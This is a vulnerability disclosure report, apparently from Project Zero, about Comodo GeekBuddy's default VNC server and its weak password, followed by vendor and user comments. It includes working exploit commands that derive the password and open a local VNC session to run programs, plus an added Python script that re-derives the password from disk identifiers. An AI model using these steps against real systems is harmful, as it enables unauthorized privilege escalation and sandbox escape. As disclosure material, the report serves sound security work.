Comodo: Comodo Internet Security installs and starts a VNC server by default
Reported by email@example.com (Project Member), Jan 20 2016
When you install Comodo Internet Security, in the default configuration an application called "GeekBuddy" is also installed and added to HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support application that uses a number of questionable and shady tactics to encourage users to pay for online tech support.

https://www.comodo.com/home/support-maintenance/geekbuddy.php

As has been noted by numerous people over the last few years, GeekBuddy also installs a VNC server and enables it by default, e.g.

https://forums.comodo.com/geekbuddy-live-pc-support/geekbuddy-tightvnc-http-port-opened-default-on-5800-without-request-vulnerable-t111103.0.html
https://packetstormsecurity.com/files/131963/Comodo-GeekBuddy-Local-Privilege-Escalation.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7872

This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solved. Not to mention that this is also a sandbox escape that even works against Comodo and Chromodo sandboxes, not to mention Chrome, Protected Mode, and other sandboxes.
This information is available to unprivileged users; for example, an unprivileged user can launch calc.exe like this:

    $ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
    Caption                                    SerialNumber  Signature   TotalTracks
    VMware, VMware Virtual S SCSI Disk Device                -135723213  1997160
    $ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
    7d4612e5
    $ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -

I'm using vncdotool from here: https://github.com/sibson/vncdotool

(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice; I think this is a bug.)

Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters (!!!):

    $ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
    HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
        osInstanceId    REG_SZ    7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3

Screenshot attached for reference.

It feels like there might be a way to make this remote, perhaps via dns-rebinding and websockets.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
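Worked example of the password derivation the report describes, added here by the editor; it is not part of the original bug report, not Comodo's code, and not the reporter's script. It re-implements SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks) truncated to 8 characters, drops whitespace from the caption as the reporter's printf does, substitutes TotalTracks for a missing SerialNumber (the quirk noted in the report), and compares the result against the first 8 characters of the osInstanceId registry value. The function names, the `wmic /format:csv` parsing (assumed column names Caption, SerialNumber, Signature, TotalTracks) and the sample CSV record are the editor's assumptions; the sample record is constructed from the disk values shown above, not captured from a live host.

```python
"""
Re-derive the GeekBuddy VNC password from disk identifiers (editor's added
example, not Comodo's code nor the report's own commands).

Assumptions (editor's): the caption is concatenated with its whitespace
removed, the fields go in the order Caption, Signature, SerialNumber,
TotalTracks, and an empty SerialNumber is replaced by TotalTracks.
"""
import csv
import hashlib
import io
import platform
import subprocess


def geekbuddy_preimage(caption, signature, serial_number, total_tracks):
    """Build the string that is hashed, per the report's printf line."""
    # "VMware, VMware Virtual S SCSI Disk Device" -> "VMware,VMwareVirtualSSCSIDiskDevice"
    caption_nospace = "".join(str(caption).split())
    serial = (serial_number or "").strip()
    if not serial:
        # No SerialNumber on the disk: the report observes TotalTracks is used twice.
        serial = str(total_tracks)
    return caption_nospace + str(signature) + serial + str(total_tracks)


def geekbuddy_vnc_password(caption, signature, serial_number, total_tracks):
    """Return (8-character VNC password, full 40-character SHA1 hex digest)."""
    preimage = geekbuddy_preimage(caption, signature, serial_number, total_tracks)
    digest = hashlib.sha1(preimage.encode("ascii")).hexdigest()
    return digest[:8], digest


def passwords_from_wmic_csv(text):
    """Derive one password per disk from `wmic diskdrive get ... /format:csv` output.

    Assumption (editor's): the CSV header carries the property names Caption,
    SerialNumber, Signature and TotalTracks. wmic commonly emits a leading
    blank line and doubled carriage returns; both are normalised away here.
    """
    cleaned = text.replace("\r", "").strip()
    results = []
    for row in csv.DictReader(io.StringIO(cleaned)):
        password, digest = geekbuddy_vnc_password(
            row["Caption"], row["Signature"], row.get("SerialNumber"), row["TotalTracks"]
        )
        results.append({"caption": row["Caption"], "password": password, "sha1": digest})
    return results


def matches_registry_os_instance_id(password, os_instance_id):
    """The check: osInstanceId under HKLM\\System\\Software\\COMODO\\CLPS 4\\CA
    should start with the derived 8-character password."""
    return os_instance_id.lower().startswith(password.lower())


# Constructed sample (not captured from a real host) using the disk values
# shown in the report: empty SerialNumber, Signature -135723213, TotalTracks 1997160.
SAMPLE_WMIC_CSV = (
    "\n"
    "Node,Caption,SerialNumber,Signature,TotalTracks\n"
    'WIN-TEST,"VMware, VMware Virtual S SCSI Disk Device",,-135723213,1997160\n'
)


def live_wmic_csv():
    """On Windows, read the real disk identifiers with wmic; elsewhere return None."""
    if platform.system() != "Windows":
        return None
    proc = subprocess.run(
        ["wmic", "diskdrive", "get", "Caption,SerialNumber,Signature,TotalTracks", "/format:csv"],
        capture_output=True, text=True, check=False,
    )
    return proc.stdout


if __name__ == "__main__":
    source = live_wmic_csv() or SAMPLE_WMIC_CSV
    for entry in passwords_from_wmic_csv(source):
        print(f"{entry['caption']!r}: VNC password {entry['password']} (sha1 {entry['sha1']})")
```

Run on a host with GeekBuddy installed, the printed 8-character value should match `cut -c-8` of the osInstanceId registry value from the report; if it does, the "generated" password offers no more protection than the blank one it replaced, because every unprivileged user can read the same WMI fields.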
Feb 18 2016

Update today:

    Hello Tavis,
    Regarding the vulnerability below, we have issued a hotfix on 10th of February. GB 4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.
Feb 19 2016

Wow, so that's what you meant on Twitter. That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it. Thanks for everything you and Project Zero does. :)
Feb 20 2016

Comment from Comodo: https://blog.comodo.com/comodo-news/10747/
Feb 21 2016

Wow, have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" they claim, completely dismissing responsibility for what is a serious privilege escalation vulnerability.
Feb 22 2016

This transcends a simple bug and vulnerability, it is a backdoor.
Feb 26 2016

@tobias, indeed, it's also written after the fact, as though the current state is how it was before. You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.